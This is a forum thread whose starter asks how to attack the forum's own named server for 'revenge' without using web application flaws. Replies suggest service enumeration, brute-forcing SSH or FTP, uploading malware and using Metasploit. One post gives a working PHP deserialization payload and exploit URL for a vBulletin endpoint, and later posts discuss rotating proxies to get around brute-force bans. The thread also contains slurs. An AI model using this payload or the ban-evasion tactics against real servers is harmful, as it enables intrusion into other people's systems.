User Controls

Options For Attacking A Web Server That Aren't Web Application Related

  1. #1
    SBTlauien African Astronaut
    Let's say hypothetically, that I was on a mission to attack niggasin.space. Lanny had rubbed me the wrong way(sexually) and I was going after his server for revenge. If I didn't want to attack his site via a potential web application vulnerability, what other options would I have?

    Let's split the question and say in one scenario that he had a bunch of port open(like 22, 25,X 80, 443, 631...all were for the default protocol), and the other scenario he only had 80 and 443 open.
  2. #2
    DDOS and 10 trillion spambots.
  3. #3
    SBTlauien African Astronaut
    ^Oh gawd.

    New rule, no DOS type attacks. Actual, real attacks that require at least a small amount of skill.
  4. #4
    SBTlauien African Astronaut
    I think I found my answer. It looks like I would have to find a vulnerability for what ever service is running on that particular port.

    Is it a dead end if Lanny open had port 80 open?
  5. #5
    Sophie Pedophile Tech Support
    Attack the services running on the webserver. Like FTP, POP3, the mailserver. Sometimes the MySQL DB listens on port 3306. You could bruteforce the file server and upload malware. Or see if there is a flaw in the service you are targeting itself that can be exploited with a buffer overflow or what have you. This is why it is important to enumerate the type of service you are dealing with and the version. One such technique involves banner grabbing with the FTP service to get the version and such. Once you know the version you can look for vulnerabilities on exploit-db and similar sites. Or download the exact same thing run it locally and bang on it/reverse engineer until you find something.

    Nexpose and Metasploit are really good at server side security testing.
    The following users say it would be alright if the author of this post didn't die in a fire!
  6. #6
    Sophie Pedophile Tech Support
    Originally posted by SBTlauien I think I found my answer. It looks like I would have to find a vulnerability for what ever service is running on that particular port.

    Yeah this. Wrote my reply while you were writing yours lol.
  7. #7
    SBTlauien African Astronaut
    Guess I'm going to have to start learning about some these tools(Metasploit specifically). Bufferoverflows as well.
  8. #8
    -SpectraL coward [the spuriously bluish-lilac bushman]


    php << 'eof'
    <?php
    class vB_Database {
    public $functions = array();

    public function __construct()
    {
    $this->functions['free_result'] = 'phpinfo';
    }
    }

    class vB_dB_Result {
    protected $db;
    protected $recordset;

    public function __construct()
    {
    $this->db = new vB_Database();
    $this->recordset = 1;
    }
    }

    print urlencode(serialize(new vB_dB_Result())) . "\n";
    eof
    O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D

    http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D


    The following users say it would be alright if the author of this post didn't die in a fire!
  9. #9
    -SpectraL coward [the spuriously bluish-lilac bushman]
    http://legalhackers.com/advisories/vBulletin-SSRF-Vulnerability-Exploit.txt
  10. #10
    Lanny Bird of Courage
    Yeah, every attack has to be against some kind of service. Obviously an HTTP server is available on 80. Most servers will run SSH on 22 because for people like me, who rent a server in someone else's data center, it's literally the only way I can connect. Here at niggasin.space we allow ICMP connections and TCP connections on 22, 80, 443, everything else is firewalled from anywhere but the DB server and localhost. Nothing runs on 443, 80 is NGINX and uWSGI and 22 is sshd. Low hanging fruit is someone leaving password login for root or a sudoer enabled so you can brute force SSH login. No dice in this case because you'll get a blanket ban on incoming connections with like 8 failures and you can only do key based auth, but that would be the usual initial strat.

    Following that there's a much higher chance of there being a critical bug in my homebrewed forum code which you can read in its entirety than in sshd which is also open source but far better reviewed.
  11. #11
    -SpectraL coward [the spuriously bluish-lilac bushman]
    That's why you use a "rotating IP" proxy, so you always have a different IP on every attempted connection.
  12. #12
    Sophie Pedophile Tech Support
    Originally posted by -SpectraL That's why you use a "rotating IP" proxy, so you always have a different IP on every attempted connection.

    You can do this from a defensive standpoint too. It's called an upstream proxy. But good luck rotating your upstream proxy without some DNS fast fluxing magic.

    Post last edited by Sophie at 2017-02-01T19:15:22.778167+00:00
  13. #13
    Sophie Pedophile Tech Support
    Originally posted by SBTlauien Guess I'm going to have to start learning about some these tools(Metasploit specifically). Bufferoverflows as well.

    Metasploit has an impressive array of exploits all on its own, including buffer overflows. Furthermore it is really easy to use. The hardest part is enumerating, and positively identifying vulnerabilities when it comes to metasploit. If you are looking for study materials related to Metasploit have a gander over here https://www.offensive-security.com/metasploit-unleashed/requirements/

    Get the Metasploitable Distro from Offensive Security as well so you can do some labs. I have some experience with Metasploit so if you have any questions i would be happy to try and answer them for you as far as i am able.
  14. #14
    -SpectraL coward [the spuriously bluish-lilac bushman]
    Warning, though. Many "tools" have hidden author backdoors embedded in them. You play with matches, sometimes you get burnt.
  15. #15
    Sophie Pedophile Tech Support
    Originally posted by -SpectraL Warning, though. Many "tools" have hidden author backdoors embedded in them. You play with matches, sometimes you get burnt.

    Metasploitable is specifically built to be vulnerable. So you can do your testing on that. Obviously you wouldn't run a vulnerable distro as main OS. You run it in VM. Furthermore, Metasploit is completely open source and Rapid7 is one of the best security companies in the world. So i wouldn't worry about it, and if you're still worried, simply get a pentesting distro in VM that has metasploit pre-installed.
  16. #16
    -SpectraL coward [the spuriously bluish-lilac bushman]
    Some "tools" also have intelligent capabilities, whereupon if the tool detects certain people, in certain places, at certain times, under certain circumstances, it will completely fry the user's entire system and self-destruct, so beware.
  17. #17
    Sophie Pedophile Tech Support
    Originally posted by -SpectraL Some "tools" also have intelligent capabilities, whereupon if the tool detects certain people, in certain places, at certain times, under certain circumstances, it will completely fry the user's entire system and self-destruct, so beware.

    1. You don't scare me kid.
    2. All the tools i use are either built from source or are in an interpreted language so i just have a script. Good luck embedding this type of malware functionality into a tool that is on github, open to review by the entire InfoSec and developers community.
  18. #18
    Lanny Bird of Courage
    Originally posted by -SpectraL That's why you use a "rotating IP" proxy, so you always have a different IP on every attempted connection.

    I mean you could but root login is disabled. You could easily guess my login enabled account but 1024 bit key over 8 attempts per IP is many orders of magnitudes greater than the number of IPv6 addresses in the world and even if somehow you got around the IP banning (you can't) and assuming an unrealistically low 50ms per attempt then it would take on average somewhat more time to brute force the login to niggasin.space than the universe has existed for (which is significantly longer than you think it is).
  19. #19
    Sophie Pedophile Tech Support
    Originally posted by Lanny I mean you could but root login is disabled. You could easily guess my login enabled account but 1024 bit key over 8 attempts per IP is many orders of magnitudes greater than the number of IPv6 addresses in the world and even if somehow you got around the IP banning (you can't) and assuming an unrealistically low 50ms per attempt then it would take on average somewhat more time to brute force the login to niggasin.space than the universe has existed for (which is significantly longer than you think it is).

    Oh lol, i thought spectral was talking about rotating proxies from the webserver perspective, like switching upstream proxies. My bad, should have paid better attention.
  20. #20
    -SpectraL coward [the spuriously bluish-lilac bushman]
    Originally posted by Lanny I mean you could but root login is disabled. You could easily guess my login enabled account but 1024 bit key over 8 attempts per IP is many orders of magnitudes greater than the number of IPv6 addresses in the world and even if somehow you got around the IP banning (you can't) and assuming an unrealistically low 50ms per attempt then it would take on average somewhat more time to brute force the login to niggasin.space than the universe has existed for (which is significantly longer than you think it is).

    You left out the fact that the 8 attempts per IP is not permanent. I could cycle through the IP addresses again and again.
Jump to Top